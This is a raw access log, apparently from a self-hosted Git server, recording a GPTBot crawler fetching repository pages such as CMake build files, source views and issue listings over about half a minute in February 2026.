https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:18:00:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate" -[17/Feb/2026:18:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png" -[17/Feb/2026:18:00:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/bearing.png" -[17/Feb/2026:18:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:00:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11015] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:00:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp?display=source" [Client 74.7.227.38] [Length 14208] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:18:00:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:18:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11160] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" -[17/Feb/2026:18:00:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" -[17/Feb/2026:18:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:00:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&state=all&type=all" [Client 74.7.227.38] [Length 9933] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:18:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&state=open&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:18:00:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10116] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:18:00:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:18:01:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:01:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:01:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:01:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:18:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:01:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:18:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15786] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:01:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=rendered" [Client 74.7.227.38] [Length 11071] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 15754] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" -[17/Feb/2026:18:01:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 11036] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:18:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9845] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:18:01:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11079] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:18:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 11195] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:18:01:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12026] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:01:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:01:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:01:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" [Client 74.7.227.38] [Length 11255] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:01:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" [Client 74.7.227.38] [Length 12237] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 13263] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:01:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 17111] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" -[17/Feb/2026:18:01:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:18:01:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:01:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:01:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 